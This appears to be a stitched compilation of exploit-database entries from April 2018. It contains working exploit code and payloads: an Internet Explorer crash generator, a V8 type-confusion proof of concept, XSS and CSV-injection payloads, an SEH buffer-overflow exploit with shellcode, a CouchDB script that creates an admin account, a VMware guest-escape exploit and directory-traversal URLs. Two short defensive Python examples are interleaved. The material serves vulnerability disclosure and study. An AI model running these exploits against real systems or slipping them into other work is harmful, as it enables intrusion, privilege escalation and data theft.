'''
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-(Win-10)-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
=======
www.microsoft.com
Product:
========
Internet Explorer (Windows 10)
v11.371.16299.0
Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.
Vulnerability Type:
==================
Denial Of Service
CVE Reference:
==============
N/A
Security Issue:
================
A null pointer de-reference (read) results in an Internet Explorer denial of service (crash) when MSIE encounters a specially crafted
HTML HREF tag containing an empty reference for certain Windows file types. Upon the IE crash it will at times daringly attempt to restart itself;
if that occurs and the user is prompted by IE to restore their browser session, then selecting this option has so far, in my tests, repeated the
crash all over again. This can be leveraged by visiting a hostile webpage or link to crash an end user's MSIE browser.
Referencing some of the following extensions, .exe:, .com:, .pif:, .bat: and .scr:, should produce the same :)
Tested Windows 10
Stack Dump:
==========
(2e8c.27e4): Access violation - code c0000005 (first/second chance not available)
ntdll!NtWaitForMultipleObjects+0x14:
00007ffa`be5f0e14 c3 ret
0:015> r
rax=000000000000005b rbx=0000000000000003 rcx=0000000000000003
rdx=000000cca6efd3a8 rsi=0000000000000000 rdi=0000000000000003
rip=00007ffabe5f0e14 rsp=000000cca6efcfa8 rbp=0000000000000000
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
r11=0000000000000246 r12=0000000000000010 r13=000000cca6efd3a8
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!NtWaitForMultipleObjects+0x14:
00007ffa`be5f0e14 c3 ret
CONTEXT: (.ecxr)
rax=0000000000000000 rbx=000001fd4a2ec9d8 rcx=0000000000000000
rdx=00007ffabb499398 rsi=000001fd4a5b0ce0 rdi=0000000000000000
rip=00007ffabb7fc646 rsp=000000cca6efe4f8 rbp=000000cca6efe600
r8=0000000000000000 r9=0000000000008000 r10=00007ffabb499398
r11=0000000000000000 r12=0000000000000000 r13=00007ffabb48d060
r14=0000000000000002 r15=0000000000000001
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
KERNELBASE!StrCmpICW+0x6:
00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11] ds:00000000`00000000=????
Resetting default scope
FAULTING_IP:
KERNELBASE!StrCmpICW+6
00007ffa`bb7fc646 450fb70b movzx r9d,word ptr [r11]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 0000000000000000
Attempt to read from address 0000000000000000
DEFAULT_BUCKET_ID: NULL_POINTER_READ
PROCESS_NAME: iexplore.exe
POC video URL:
==============
https://vimeo.com/265691256/
Exploit/POC:
============
1) Run below python script to create "IE-Win10-Crasha.html"
2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10
'''
payload=('<br>\n'+
'<center>MSIE v11.371.16299 Denial Of Service by hyp3rlinx <br>\n'+
'<a href=".cmd:" id="hate">crashy ware shee</a>\n'+
'<br>\n'+
'Tested successfully on Windows 10\n'+
'</center><script>\n'
'function doit(){\n'+
'document.getElementById("hate").click();\n'+
'alert("DOH!");\n'+
'}\n'+
'setInterval("doit()", 2000)\n'+
'</script>')
file=open("IE-Win10-Crasha.html","w")
file.write(payload)
file.close()
print 'MS InternetExplorer (Win 10) '
print 'Denial Of Service File Created.'
print 'hyp3rlinx'
'''
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: April 18, 2018
Vendor Closes Thread: April 19, 2018
Public Disclosure: April 20, 2018
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
'''
The attached fuzzed swf file causes heap or stack corruption (depending on platform) when rendering a slab.
This PoC crashes a little bit unreliably, it is the most reliable in the standalone Flash player and Microsoft Edge.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44527.zip
/*
https://cs.chromium.org/chromium/src/v8/src/compiler/node-properties.cc?rcl=df84e87191022bf6914f9570069908f10b303245&l=416
Here's a snippet of NodeProperties::InferReceiverMaps.
    case IrOpcode::kJSCreate: {
      if (IsSame(receiver, effect)) {
        HeapObjectMatcher mtarget(GetValueInput(effect, 0));
        HeapObjectMatcher mnewtarget(GetValueInput(effect, 1));
        if (mtarget.HasValue() && mnewtarget.HasValue()) {
          Handle<JSFunction> original_constructor =
              Handle<JSFunction>::cast(mnewtarget.Value());
          if (original_constructor->has_initial_map()) {
            Handle<Map> initial_map(original_constructor->initial_map());
            if (initial_map->constructor_or_backpointer() ==
                *mtarget.Value()) {
              *maps_return = ZoneHandleSet<Map>(initial_map);
              return result;
            }
          }
        }
        // We reached the allocation of the {receiver}.
        return kNoReceiverMaps;
      }
      break;
    }

"mnewtarget" is expected to be a constructor, which can also be of type JSBoundFunction. But "mnewtarget" is always cast to JSFunction, which leads to type confusion.
The PoC seems not to crash in release mode.
Debug mode log:
#
# Fatal error in ../../src/objects-inl.h, line 566
# Check failed: !v8::internal::FLAG_enable_slow_asserts || (object->IsJSFunction()).
#
==== C stack trace ===============================
/v8/out.gn/x64.debug/./libv8_libbase.so(v8::base::debug::StackTrace::StackTrace()+0x1e) [0x7f4623e1043e]
/v8/out.gn/x64.debug/./libv8_libplatform.so(+0x30907) [0x7f4623db3907]
/v8/out.gn/x64.debug/./libv8_libbase.so(V8_Fatal(char const*, int, char const*, ...)+0x1bd) [0x7f4623df876d]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::JSFunction::cast(v8::internal::Object*)+0x64) [0x7f46226584a4]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::Handle<v8::internal::JSFunction> const v8::internal::Handle<v8::internal::JSFunction>::cast<v8::internal::JSFunction>(v8::internal::Handle<v8::internal::JSFunction>)+0x23) [0x7f4622651173]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::NodeProperties::InferReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::ZoneHandleSet<v8::internal::Map>*)+0x435) [0x7f4622c24a75]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::InferReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, std::__1::vector<v8::internal::Handle<v8::internal::Map>, std::__1::allocator<v8::internal::Handle<v8::internal::Map> > >*)+0x50) [0x7f4622b8b820]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ExtractReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::FeedbackNexus const&, std::__1::vector<v8::internal::Handle<v8::internal::Map>, std::__1::allocator<v8::internal::Handle<v8::internal::Map> > >*)+0x202) [0x7f4622b82632]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ReduceNamedAccessFromNexus(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::FeedbackNexus const&, v8::internal::Handle<v8::internal::Name>, v8::internal::compiler::AccessMode)+0x2e6) [0x7f4622b822b6]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ReduceJSStoreNamed(v8::internal::compiler::Node*)+0x298) [0x7f4622b7c2c8]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::Reduce(v8::internal::compiler::Node*)+0x11f) [0x7f4622b78f7f]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::Reduce(v8::internal::compiler::Node*)+0x285) [0x7f4622ad8c55]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceTop()+0x44f) [0x7f4622ad874f]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceNode(v8::internal::compiler::Node*)+0x1bc) [0x7f4622ad7cfc]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceGraph()+0x2d) [0x7f4622ad89bd]
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::InliningPhase::Run(v8::internal::compiler::PipelineData*, v8::internal::Zone*)+0x58a) [0x7f4622c46e2a]
PoC:
*/
// Flags: --allow-natives-syntax --enable_slow_asserts
class Base {
  constructor() {
    this.x = 1;
  }
}

class Derived extends Base {
  constructor() {
    // JSCreate emitted I guess.
    super();
  }
}

let bound = Object.bind();
Reflect.construct(Derived, [], bound); // Feed a bound function as new.target to the profiler, so HeapObjectMatcher can find it.
%OptimizeFunctionOnNextCall(Derived);
new Derived();
SEC Consult Vulnerability Lab Security Advisory < 20180423-0 >
=======================================================================
title: Multiple Stored XSS Vulnerabilities
product: WSO2 Carbon, WSO2 Dashboard Server
vulnerable version: WSO2 Identity Server 5.3.0
fixed version: WSO2 Identity Server 5.5.0
CVE number: CVE-2018-8716
impact: high
homepage: https://wso2.com/products/dashboard
found: 2017-12-13
by: W. Schober (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"WSO2 Carbon redefines middleware by providing an integrated and componentized
middleware platform that adapts to the specific needs of any enterprise
IT project - on premise or in the cloud.
100% open source and standards-based, WSO2 Carbon enables developers to rapidly
orchestrate business processes, compose applications and develop services using
WSO2 Developer Studio and a broad range of business and technical services that
integrate with legacy, packaged and SaaS applications.
The lean, complete, OSGi-based platform includes more than 175 components – OSGi
bundles or Carbon features. The WSO2 Carbon core framework functions as
“Eclipse for servers” and includes common capabilities shared by all WSO2
products, such as built-in registry, user management, transports, security,
logging, clustering, caching and throttling services, co-ordination, and a
GUI framework."
Source: https://wso2.com/products/carbon/
"The WSO2 Dashboard Server (formerly WSO2 User Engagement Server) helps to
rapidly create visually appealing and engaging web components such as
dashboards, and gadgets, and unlocking data for business intelligence and
monitoring. With the host of capabilities that Dashboard Server provides
out-of-the-box, going from data to screen has never been easier."
Source: https://wso2.com/products/dashboard-server/
Business recommendation:
------------------------
SEC Consult recommends performing a thorough security review, conducted by
security professionals, to identify and resolve all security issues.
Vulnerability overview/description:
-----------------------------------
1) Stored Cross-Site Scripting in WSO2 Dashboard (CVE-2018-8716)
The dashboard is used by the end-users to manage their accounts, change passwords,
alter their profiles, or change certain settings. An attacker is able to inject
arbitrary JavaScript payloads into various textboxes (username, home address,
lastname, firstname, etc).
The payloads are permanently stored in the dashboard and triggered every time the
dashboard is visited. The payload is also potentially triggered in the Carbon
part of WSO2, which means that an attacker would be able to inject payloads
from the front-end application into a middleware application that is not
accessible from the internet, and thereby attack administrators.
2) Stored Cross-Site Scripting in WSO2 Carbon
The carbon UI offers a feature to add multiple BPS-Worker Hosts. In the worker
host URL an arbitrary JavaScript payload can be injected and permanently stored
in the web application.
Proof of concept:
-----------------
1) Stored Cross-Site Scripting in WSO2 Dashboard
The following input fields are vulnerable and JavaScript payloads can be directly
injected:
- Firstname
- Lastname
- Username
- Address
It is suspected that all user inputs are returned unfiltered in all server responses.
2) Stored Cross-Site Scripting in WSO2 Carbon
To demonstrate the vulnerability, it is sufficient to add a new BPS worker and set
the URL to the following payload: "><img src=x onerror=alert(document.cookie)>
Every time the Carbon middleware application is accessed, the payload is triggered.
Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the most recent version
at the time of discovery:
* WSO2IS 5.3.0
Vendor contact timeline:
------------------------
2018-01-25: Contacting vendor through security@wso2.com
2018-02-08: Asking for status update. Vendor responds, that they are
still investigating the issue.
2018-02-21: Vendor responds with release date and further details
concerning the nature of the vulnerabilities. The XSS in the
Carbon component was a duplicate and should be already fixed.
Concerning the XSS in the dashboard a fix is implemented
and will be rolled out with the release of WSO2 Identity
Server 5.5.0.
2018-03-14: Requesting CVE from Mitre for the stored XSS in the Dashboard.
2018-03-15: Mitre assigned CVE-2018-8716.
2018-03-26: Vendor informed us, that the final release of the updated
software will be on 5th of April.
2018-04-23: Public Release
Solution:
---------
Update WSO2 Identity Server to 5.5.0
Workaround:
-----------
No workaround available
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
The attached image causes an info leak in image inflation. It occasionally crashes when rendered; otherwise it displays uninitialized memory as pixels.
To reproduce, put the attached images on a webserver and visit: http://127.0.0.1?img=inflate.png.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44528.zip
The attached swf file causes an out-of-bounds write in blur filtering.
This PoC crashes reliably in Firefox for Linux.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44529.zip
# Exploit Title: Shopy Point of Sale v1.0 - CSV Injection
# Date: 2018-04-23
# Exploit Author: 8bitsec
# CVE: CVE-2018-10258
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/shopy-point-of-sales/21730225
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
Release Date:
=============
2018-04-23
Product & Service Introduction:
===============================
Point of sale for retail stores
Technical Details & Description:
================================
A user is able to inject a command that will be included in the exported CSV file.
Proof of Concept (PoC):
=======================
1. Login with Sales user's credentials
2. Browse to Trader > Customer > New Customer and add =cmd|'/C calc'!A1 into the Customer Name field
3. Log in with admin's credentials
4. Browse to Sales > Create Invoice to create an invoice for that user
5. Browse to All Invoice > Export to download and open the exported CSV file
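What an export routine needs in order to make the step-2 payload harmless, as an added example in Python 3 (not Shopy's code; the customer rows are constructed): every cell that a spreadsheet would evaluate as a formula is prefixed with a single quote and quoted, following the usual CSV-injection guidance, and a review helper flags raw cells that would still execute.

```python
"""Neutralise spreadsheet-formula injection in CSV exports.

Added example, not part of the Shopy advisory. Any cell beginning with a
character that spreadsheet applications treat as the start of a formula
(=, +, -, @, tab, carriage return) is prefixed with an apostrophe so it is
displayed as text, and every cell is quoted so the prefix survives the
round trip through the CSV file.
"""
import csv
import io

# Leading characters that make Excel/LibreOffice evaluate a cell.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_cell(text):
    """Review check: True if this raw cell text would be run as a formula."""
    return text.startswith(FORMULA_TRIGGERS)


def neutralise_cell(value):
    """Return a CSV-safe string for one cell; None becomes an empty cell."""
    text = "" if value is None else str(value)
    if is_formula_cell(text):
        # A leading apostrophe forces text interpretation in spreadsheets.
        return "'" + text
    return text


def export_rows(rows, header):
    """Write rows to a CSV string with every cell neutralised and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralise_cell(v) for v in row])
    return buf.getvalue()


# Constructed sample data: the second customer name is the payload from the
# advisory; the third shows that a harmless leading minus is also prefixed.
CUSTOMERS = [
    (1, "Alice Example", "alice@example.test"),
    (2, "=cmd|'/C calc'!A1", "mallory@example.test"),
    (3, "-5 discount", "bob@example.test"),
]

if __name__ == "__main__":
    print(export_rows(CUSTOMERS, ("id", "name", "email")))
```

The apostrophe prefix is visible to users who open the file in a spreadsheet, which is the accepted trade-off; stripping the trigger characters instead would silently alter customer data.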
==================
# Exploit Title: Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)
# Date: 2018-04-23
# Exploit Author: Marwan Shamel
# Software Link: https://filehippo.com/download_free_download_manager/925/
# Version: v2.0 Built 417
# Tested on: Windows 7 Enterprise SP1 32 bit
# Special thanks to my wife
# Steps : file > Import > Import lists of downloads > open URL file that includes http://192.168.1.53:81 (HOST|Port changed according to your needs)
#!/usr/bin/python
from socket import *
from time import sleep
host = "192.168.1.53"
port = 81
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
nseh = "\xeb\x88\x90\x90" #Short Jump backward 118bytes (jmp short 0xffffff8a) (more bytes can be jumped backwards depending on the shell code size required )
seh = "\xd1\x9c\x4a\x00" #address to trigger POP-POP-RETURN sequence
# Evil: produces a message box (113 bytes); can be changed according to your needs
evil = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7"
payload = "\x43" * (1724-255) + "\x90" * 142 + evil + nseh + seh
buffer = "HTTP/1.1 301 Moved Permanently\r\n"
buffer += "Date: Thu, 23 Feb 2018 10:21:08 GMT\r\n"
buffer += "Server: Apache/2.2.22 (Debian)\r\n"
buffer += "Location: "+ payload + "\r\n"
buffer += "Vary: Accept-Encoding\r\n"
buffer += "Content-Length: 8000\r\n"
buffer += "Keep-Alive: timeout=5, max=100\r\n"
buffer += "Connection: Keep-Alive\r\n"
buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"
buffer += "\r\n"
buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
buffer += "<html><head>\n"
buffer += "<title>301 Moved Permanently</title>\n"
buffer += "</head><body>\n"
buffer += "<h1>Moved Permanently</h1>\n"
buffer += "<p>The document has moved <a href=\""+payload+"\">here</a>.</p>\n"
buffer += "</body></html>\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
sleep(1)
cl.close()
s.close()
#!/usr/bin/env python
'''
@author: r4wd3r
@license: MIT License
@contact: r4wd3r@gmail.com
'''
import argparse
import re
import sys
import requests
parser = argparse.ArgumentParser(
description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +
' (CVE-2017-12635)')
parser.add_argument('host', help='Host to attack.', type=str)
parser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984')
parser.add_argument('-u', '--user', help='Username to create as admin.',
type=str, default='couchara')
parser.add_argument('-P', '--password', help='Password of the created user.',
type=str, default='couchapass')
args = parser.parse_args()
host = args.host
port = args.port
user = args.user
password = args.password
pat_ip = re.compile("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")
if not pat_ip.match(host):
    print "[x] Wrong host. Must be a valid IP address."
    sys.exit(1)
print "[+] User to create: " + user
print "[+] Password: " + password
print "[+] Attacking host " + host + " on port " + port
url = 'http://' + host + ':' + port
try:
    rtest = requests.get(url, timeout=10)
except requests.exceptions.Timeout:
    print "[x] Server is taking too long to answer. Exiting."
    sys.exit(1)
except requests.ConnectionError:
    print "[x] Unable to connect to the remote host."
    sys.exit(1)
# Payload for creating user
cu_url_payload = url + "/_users/org.couchdb.user:" + user
cu_data_payload = '{"type": "user", "name": "'+user+'", "roles": ["_admin"], "roles": [], "password": "'+password+'"}'
try:
    rcu = requests.put(cu_url_payload, data=cu_data_payload)
except requests.exceptions.HTTPError:
    print "[x] ERROR: Unable to create the user on remote host."
    sys.exit(1)
if rcu.status_code == 201:
    print "[+] User " + user + " with password " + password + " successfully created."
    sys.exit(0)
else:
    print "[x] ERROR " + str(rcu.status_code) + ": Unable to create the user on remote host."
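The user document the script above PUTs carries the "roles" key twice, and CVE-2017-12635 exists because two JSON parsers inside CouchDB resolved that duplicate differently. The following added example (Python 3, not the exploit author's code; the sample document is a constructed copy of the payload) shows the disagreement between a last-wins and a first-wins parser on the same bytes, and a strict loader that rejects any repeated key, which is the check a validation layer wants in front of privilege-bearing fields.

```python
"""Reject JSON documents that repeat a key.

Added example, not part of the exploit above. Python's json module keeps
the last value for a duplicate key; a parser that keeps the first value
sees a different document. The strict loader refuses the input instead of
choosing, so every component downstream sees the same thing.
"""
import json


class DuplicateKeyError(ValueError):
    """Raised when a JSON object repeats a key at any nesting depth."""


def _reject_duplicates(pairs):
    """object_pairs_hook: build a dict but fail on any repeated key."""
    obj = {}
    for key, value in pairs:
        if key in obj:
            raise DuplicateKeyError("duplicate key: %r" % key)
        obj[key] = value
    return obj


def loads_strict(text):
    """json.loads that raises DuplicateKeyError on repeated keys."""
    return json.loads(text, object_pairs_hook=_reject_duplicates)


def loads_first_wins(text):
    """Mimic a parser that keeps the first occurrence of a key."""
    def first(pairs):
        obj = {}
        for key, value in pairs:
            obj.setdefault(key, value)
        return obj
    return json.loads(text, object_pairs_hook=first)


# Constructed sample: the shape of the user document the script above sends.
USER_DOC = ('{"type": "user", "name": "couchara", "roles": ["_admin"], '
            '"roles": [], "password": "couchapass"}')


def roles_seen_by_each_parser(text):
    """Show how last-wins and first-wins parsers disagree on the same bytes."""
    return {
        "last_wins": json.loads(text)["roles"],
        "first_wins": loads_first_wins(text)["roles"],
    }


if __name__ == "__main__":
    print(roles_seen_by_each_parser(USER_DOC))
    try:
        loads_strict(USER_DOC)
    except DuplicateKeyError as exc:
        print("rejected:", exc)
```

The validation-side lesson is that a document accepted by one parser and authorised by another is only safe if both agree on every key; rejecting duplicates outright removes the ambiguity.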
// Standard headers added for this listing. The VMware tools RPC helpers
// (stringf, RpcOut_SendOneRaw, Message_Open/SendSize/RawSend/Close,
// ExceptionIsBackdoor, NOT_WMWARE_ERROR) and the strings tov4, tov2 and
// dndtransport are not defined in this excerpt.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

char *initial_dnd = "tools.capability.dnd_version 4";
static const int cbObj = 0x100;
char *second_dnd = "tools.capability.dnd_version 2";
char *chgver = "vmx.capability.dnd_version";
char *call_transport = "dnd.transport ";
char *readstring = "ToolsAutoInstallGetParams";

typedef struct _DnDCPMsgHdrV4
{
    char magic[14];
    char dummy[2];
    size_t ropper[13];
    char shellcode[175];
    char padding[0x80];
} DnDCPMsgHdrV4;

void PrepareLFH()
{
    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    for (int idx = 0; idx < 1; ++idx) // just occupy 1
    {
        char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj);
        RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); //alloc one to occupy 4
    }
    free(pObj);
}

size_t infoleak()
{
#define MAX_LFH_BLOCK 512
    Message_Channel *chans[5] = {0};
    for (int i = 0; i < 5; ++i)
    {
        chans[i] = Message_Open(0x49435052);
        if (chans[i])
        {
            Message_SendSize(chans[i], cbObj - 1); //just alloc
        }
        else
        {
            Message_Close(chans[i - 1]); //keep 1 channel valid
            chans[i - 1] = 0;
            break;
        }
    }
    PrepareLFH(); //make sure we have at least 7 hole or open and occupy next LFH block
    for (int i = 0; i < 5; ++i)
    {
        if (chans[i])
        {
            Message_Close(chans[i]);
        }
    }
    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj);
    while (1)
    {
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        }
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            if (chan == NULL)
            {
                puts("Message send error!");
                Sleep(100);
            }
            else
            {
                Message_SendSize(chan, cbObj - 1);
                Message_RawSend(chan, "\xA0\x75", 2); //just ret
                Message_Close(chan);
            }
        }
        Message_Channel *chan = Message_Open(0x49435052);
        Message_SendSize(chan, cbObj - 1);
        Message_RawSend(chan, "\xA0\x74", 2); //free
        RpcOut_SendOneRaw(dndtransport, strlen(dndtransport), &result, NULL); //trigger double free
        for (int i = 0; i < min(cbObj-3,MAX_LFH_BLOCK); ++i)
        {
            RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL);
            Message_RawSend(chan, "B", 1);
            RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
            if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj))
            {
                Message_Close(chan); //free the string
                for (int i = 0; i < MAX_LFH_BLOCK; ++i)
                {
                    puts("Trying to leak vtable");
                    RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                    RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
                    size_t p = 0;
                    if (result)
                    {
                        memcpy(&p, result, min(strlen(result), 8));
                        printf("Leak content: %p\n", p);
                    }
                    size_t low = p & 0xFFFF;
                    if (low == 0x74A8 || //RpcBase
                        low == 0x74d0 || //CpV4
                        low == 0x7630) //DnDV4
                    {
                        printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000);
                        return (p & (~0xFFFF)) - 0x7a0000;
                    }
                    RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                }
            }
        }
        Message_Close(chan);
    }
    return 0;
}

void exploit(size_t base)
{
    char *result = NULL;
    char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141);
    char *pObj = malloc(cbObj);
    memset(pObj, 0, cbObj);
    DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4));
    memset(hdr, 0, sizeof(DnDCPMsgHdrV4));
    memcpy(hdr->magic, call_transport, strlen(call_transport));
    while (1)
    {
        RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            Message_SendSize(chan, cbObj - 1);
            size_t fake_vtable[] = {
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340};
            memcpy(pObj, &fake_vtable, sizeof(size_t) * 4);
            Message_RawSend(chan, pObj, sizeof(size_t) * 4);
            Message_Close(chan);
        }
        RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL);
        RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL);
        //check pwn success?
        RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
        if (*(size_t *)result == 0xdeadbeefc0debabe)
        {
            puts("VMware escape success! \nPwned by KeenLab, Tencent");
            RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);//fix dnd to callable prevent vmtoolsd problem
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            return;
        }
        //host dndv4 fill in, try to clean up and free again
        Sleep(100);
        puts("Object wrong! Retry...");
        RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
    }
}

int main(int argc, char *argv[])
{
    int ret = 1;
    __try
    {
        while (1)
        {
            size_t base = 0;
            do
            {
                puts("Leaking...");
                base = infoleak();
            } while (!base);
            puts("Pwning...");
            exploit(base);
            break;
        }
    }
    __except (ExceptionIsBackdoor(GetExceptionInformation()) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
    {
        fprintf(stderr, NOT_VMWARE_ERROR);
        return 1;
    }
    return ret;
}
# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability
# Date: 2018-04-20
# Software Vendor: NComputing
# Software Link:
# Author: Javier Bernardo
# Contact: javier@kwell.net
# Website: http://www.kwell.net
# CVE: CVE-2018-10201
# Category: Webapps
#[Description]
#
#It is possible to read arbitrary files outside the root directory of
#the web server. This vulnerability could be exploited remotely by a
#crafted URL without credentials, with .../ or ...\ or ..../ or ....\ as a
#directory-traversal pattern to TCP port 8667.
#
#An attacker can make use of this vulnerability to step out of the root
#directory and access other parts of the file system. This might give
#the attacker the ability to view restricted files, which could provide
#the attacker with more information required to further compromise the system.
#[PoC]
nmap -p T:8667 -Pn your_vSpace_server
Nmap scan report for your_vSpace_server (x.x.x.x)
Host is up (0.044s latency).
PORT STATE SERVICE
8667/tcp open unknown
http://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini
http://your_vSpace_server:8667/...\...\...\...\...\...\...\...\...\windows\win.ini
http://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini
http://your_vSpace_server:8667/....\....\....\....\....\....\....\....\....\windows\win.ini
